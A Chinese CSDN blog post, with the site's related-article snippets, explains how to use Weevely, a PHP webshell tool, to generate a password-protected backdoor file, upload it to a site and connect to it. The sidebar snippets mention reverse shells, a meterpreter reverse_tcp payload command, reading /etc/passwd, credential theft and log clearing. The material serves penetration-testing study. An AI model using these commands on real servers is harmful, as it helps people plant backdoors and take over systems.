linux端菜刀Weevely(php菜刀)工具使用超详解

最新推荐文章于 2022-08-16 18:46:54 发布
最新推荐文章于 2022-08-16 18:46:54 发布
阅读量751 收藏 3
点赞数
分类专栏: SRC工具 文章标签: linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45300786/article/details/110740909
版权

weevely是一款使用python编写的webshell工具(集webshell生成和连接于一身,仅用于安全学习教学之用,禁止非法用途),可以算作是linux下的一款菜刀替代工具(限于php),在linux上使用时还是很给力的,就是某些模块在windows上无法使用,总的来说还是非常不错的一款工具。
项目地址:https://github.com/epinna/Weevely

-后门生成&连接

测试系统:kali linux 5.3.0 amd64
环境:kali linux 自带apache+php+mysql环境
工具版本: weevely 3.7.0
下面分块来对参数或命令进行说明

后门生成(参数)

:generate(生成php后门文件)
-在指定路径下生成所设置密码的php后门文件(密码最小长度为4),然后将后门文件传至目标站点即可
在这里插入图片描述
后门连接(依次将上面生成的3种后门传至本地服务器根目录进行测试)
weevely url password
在这里插入图片描述
参考https://www.freebuf.com/sectool/39765.html

樱浅沐冰
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
应用在Linux系统上的指纹识别系统
03-04
目前的指纹识别系统多是基于Windows系统的,个别国外公司正在开发基于linux系统的设备驱动。现在,指纹识别系统FIS1.0已在中软 Linux V3.0系统上实现。这使Linux用户在访问系统前必须通过指纹验证,进一步加强了系统的安全性。为了增强中软linux操作系统用户身份认证的功能, 中软总公司还开发一个生物识别系统——指纹仪。指纹识别系统FIS1.0不仅提供一个应用指纹识别进行身份认证的应用程序,而且为用户提供一系列的API结构,是用户可以基于指纹识别系统开发自己的应用程序。
Weevely(Linux中的菜刀)
qq_45521281的博客
06-06 7821
声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 文章目录基本用法后门生成连接后门weevely模块几个模块的使用::shell_su模块:system_info模块:audit_disablefunctionbypass模块:audit_etcpasswd模块:backdoor_reversetcp模块:audit.phpconf使用技巧获取其他用户的凭据绕过策略读取/etc/passwd猜解SQL用户凭据日志清理绕过系统禁用函
Linux下的菜刀weevely
qq_58000413的博客
08-16 355
backdoor_meterpreter -payload php/meterpreter/reverse_tcp -l host 本机ip -port 口。命令:weevely generate -obfuscator cleartext1_php 例子:weevely http://192.168.3.248/shell.php shell。命令:weevely generate
linux 运行菜刀,linux 菜刀
weixin_42131443的博客
04-30 177
好像win下只能调用dll,既然你是用c/c++开发的库,那就应该尽可能的使用跨平台的api,win下发布为dll,linux下发布为so。就像汽车靠轮子走,轮船靠螺旋桨走是一个道理,虽然都是发动机带动。so是linux下编译的库文件而dll是win平台的是不是win上面安装了EcgAnalysis,linux上面没有安装EcgAnalysis类?你可以去看一些跨平台的解决方案,例如Eclipse...
Maccms8RceBypass_horsen9f_getshell_MacCMSgetshell_菜刀工具mac_eateni
09-11
这个工具主要功能是实现对目标系统获取shell权限,也就是所谓的“getshell”,并且可以使用菜刀工具进行连接。 【描述】中提到的“Mac8.0的一款getshell工具 直接传一句话 用菜刀连就行了”意味着这个工具能够...
Xise19.9无视世界WAF.zip_菜刀
09-15
更新日志  生成内页修复生成内页内核,加速生成效率。  生成内页支持新闻采集模式,可选本地新闻或远程新闻。  生成内页支持防删功能。  生成内页支持批量操作,可数千shell不间断生成。...
python模拟菜刀反弹shell绕过限制【推荐】
09-19
主要介绍了利用python模拟菜刀反弹shell绕过限制,本文给大家介绍的非常详细,具有一定的参考借鉴价值,需要的朋友可以参考下
小小菜刀编辑器 v2.0 (php版).rar
08-30
"小小菜刀编辑器 v2.0 (php版).rar"是一款专为网页内容编辑设计的轻量级工具,其版本2.0在1.0的基础上进行了改进和升级。这款编辑器的独特之处在于它是开发者参考了网络上的多种编辑器设计理念后自主开发的,旨在...
行业文档-设计装置-一种节能菜刀.zip
08-29
节能菜刀的核心概念是降低使用过程中的能量消耗,这可能体现在材料选择、刀具结构设计以及使用效率等多个方面。设计者可能会选用轻质但强度高的材料,减少挥动时的体力消耗;或者通过优化刀片形状和刃口处理,提高...
IVBD『PHP菜刀html版开源』
11-11
IVBD工作室搜集网上资源及收费软件,授权于麒麟安全组旗下
Weevely linux中的中国菜刀(转)
hackerie的博客
10-24 1846
转载: http://www.cnblogs.com/demonspider/archive/2013/04/05/3001139.htmlweevely 是BT5中一个常用的webshell后门连接工具,它发挥的作用类似于中国菜刀(chopper)。root@bt:/pentest/backdoors/web/weevely# ./weevely.py generate ices gen.php
linux 运行菜刀,Linux部署常用命令
weixin_35519039的博客
04-30 136
目的该文档主要针对初次在Linux机器上部署应用,对Linux操作系统不熟悉的开发者用户,列举一些常用的命令集合以及部署步骤,供开发者对Linux系统有一个初步的了解和学习工具推荐部署工具:终工具:XShell 5文件上传:XFtpLinux常用命令1、man:该命令是学习参数命令,任何linux命令都可以通过该命令查看参数学习,具体操作明细,命令如下:lishi@iZbp10yas4kb5...
weevely-------linux中的菜刀(转载)
weixin_30851867的博客
04-05 222
weevely 是BT5中一个常用的webshell后门连接工具,它发挥的作用类似于中国菜刀(chopper)。 root@bt:/pentest/backdoors/web/weevely# ./weevely.py generate ices gen.php // 生成一个密码为 ices 的php webshell. root@bt:/pentest/backdoors/web/...
2021Kali系列 -- linux菜刀(weevely3)
weixin_41489908的博客
04-19 2591
​人这辈子总是再等,等以后,等下次,等不忙,等有条件,等有时间,等有钱了,可是,后来呢。。。 ---- 网易云热评 简介:一款运行在linux系统上的webshell管理工具,可以实现Shell访问目标,以目标为中心的SQL控制台,HTTP / HTTPS代理浏览目标,上传和下载文件,生成反向和直接TCP Shell,审核远程目标安全,口扫描以目标为中心,挂载远程文件系统,以目标为中心的Bruteforce SQL帐户。 一、下载地址(软件作者) https://github.com/ep..
WebShell连接工具(中国菜刀、WeBaCoo、Weevely)使用
悦分享
07-31 3335
第三步此时会弹出一个添加shell的对话框,由图一看出我的“dxr.php”上传在站点根目录,所以这里的地址填为http//localhost/dxr.php。最后把这个文件保存,上传到你站点里面,可以是根目录,也可以是其他,都行的。这些网页脚本常称为WEB脚本木马,比较流行的asp或php木马,也有基于.NET的脚本木马与JSP脚本木马。最后点击“添加”按钮,成功后就会产生一条新的记录,鼠标右键点击就可以进行操作了,如下图,可以进行文件管理,数据库管理,虚拟终。哈哈...大功告成!...
linux菜刀使用教程,中国菜刀使用教程
weixin_42514777的博客
05-05 1108
下载地址:x01介绍中国菜刀是一款专业的网站管理软件,用途广泛,使用方便,小巧实用。只要支持动态脚本的网站,都可以用中国菜刀来进行管理!在非简体中文环境下使用,自动切换到英文界面。UINCODE方式编译,支持多国语言输入显示。(引用于百度百科菜刀的界面:1305452-20180808210011001-1761784351.png (54.61 KB, 下载次数: 5)2019-9-26 17:...
中国菜刀php一句话,中国菜刀之写一句话木马变形
weixin_39879674的博客
04-01 855
了解一句话脚本的工作原理一句话脚本的工作原理:一句话恶意脚本分析服务与客户。(此处以asp脚本语言简述原理)一句话恶意脚本服务就是我们要用来插入到asp文件中的asp语句,(不仅仅是以asp为后缀的数据库文件),该语句将回为触发,接收入侵者通过客户提交的数据,执行并完成相应的操作,服务的代码内容为 其中pass可以自己修改一句话恶意脚本客户(即为中国菜刀主程序)用来向服务提交控制数据...
菜刀php木马_Weevely(php菜刀工具使用详解
weixin_36205101的博客
03-09 1066
-前言weevely是一款使用python编写的webshell工具(集webshell生成和连接于一身,仅用于安全学习教学之用,禁止非法用途),可以算作是linux下的一款菜刀替代工具(限于php),在linux使用时还是很给力的,就是某些模块在windows上无法使用,总的来说还是非常不错的一款工具。项目地址:https://github.com/epinna/Weevely下面就针对该工具...
buuctf菜刀666
最新发布
09-26
buf菜刀666是一个用于网络安全竞赛中的题目。根据引用中的描述,buuctf菜刀666是一个HTTP流量的题目。你可以在应用显示过滤器中输入http,查看统计里的http请求,进一步分析并解决这个题目。根据引用,你可能需要...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值